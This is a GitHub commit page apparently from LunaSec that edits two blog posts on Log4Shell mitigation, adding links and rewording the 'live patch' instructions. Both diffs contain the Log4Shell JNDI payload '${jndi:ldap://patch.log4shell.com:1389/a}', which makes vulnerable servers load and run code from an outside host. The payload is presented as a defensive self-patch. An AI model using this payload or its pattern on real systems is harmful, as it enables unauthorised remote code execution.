Skip to content

Commit

Permalink
Add links back to other posts
Browse files Browse the repository at this point in the history
  • Loading branch information
freeqaz committed Dec 16, 2021
1 parent 33bbf9c commit 7a305f7
Show file tree
Hide file tree
Showing 2 changed files with 15 additions and 5 deletions.
13 changes: 9 additions & 4 deletions docs/blog/2021-12-12-log4j-zero-day-mitigation-guide.mdx
Original file line number Diff line number Diff line change
Expand Up @@ -306,12 +306,19 @@ Because of the extensive control Log4Shell gives an attacker, it's actually poss
This isn't the recommended strategy for various reasons, but it could be a last resort for systems that you can't easily restart or modify. Note that doing this on a system
you don't have permission to is most likely illegal. The fix will only work until the server (or the JVM) is restarted.

You use our hosted version here to patch yourself:
We've published articles about this exploit that you can use to learn more about how it works.
- **[Overview (When to use it)](https://www.lunasec.io/docs/blog/log4shell-live-patch/)**,
- **[Technical Deep-dive](https://www.lunasec.io/docs/blog/log4shell-live-patch-technical)**

#### Hosted Exploit Payload

```
${jndi:ldap://patch.log4shell.com:1389/a}
```

Just simply paste that anywhere into your server where you're vulnerable, and it will work. (For example, in the `main` function when you start up your server)
Just simply paste that anywhere into your server where you're vulnerable, and it will patch you against future
exploitation. (For example, in the `main` function when you start up your server, or a known vulnerable field if it's
a vendor product you depend on.)

We have added this functionality to the [latest release](https://github.com/lunasec-io/lunasec/releases) of our
Log4Shell CLI tool if you'd prefer to run the server yourself instead.
Expand All @@ -325,8 +332,6 @@ If you need a permanent solution for Log4Shell, please check out our commercial
[Live Patch service](https://www.lunasec.io/pages/live-dependency-patching) for a production-ready alternative.
:::

How it works and how to accomplish it manually is explained in [this guide](https://github.com/Cybereason/Logout4Shell). Our implementation is based on the work they did.

## How to protect yourself from future 0-days

It's becoming increasingly apparent that Log4Shell is not going to be the last vulnerability of its kind. Any trusted dependency
Expand Down
7 changes: 6 additions & 1 deletion docs/blog/2021-12-15-log4shell-live-patch.mdx
Original file line number Diff line number Diff line change
Expand Up @@ -36,12 +36,17 @@ authors:
-->

**TL;DR:** This string will temporarily fix your systems by patching them against Log4Shell, but *please* read the rest
of this post before you use it!
of this post before you use it! **Update:** We
[posted a follow-up post](https://www.lunasec.io/docs/blog/log4shell-live-patch-technical) with a technical deep-dive
into how this exploit works.

```
${jndi:ldap://patch.log4shell.com:1389/a}
```

_If you're looking for resources on how to detect and patch yourself against Log4Shell, please also read our in-depth
[Mitigation Guide](https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide)._

## Why Log4Shell is an especially painful vulnerability

Mitigating a vulnerability in a single dependency used by your project typically requires a lot of work:
Expand Down

0 comments on commit 7a305f7

Please sign in to comment.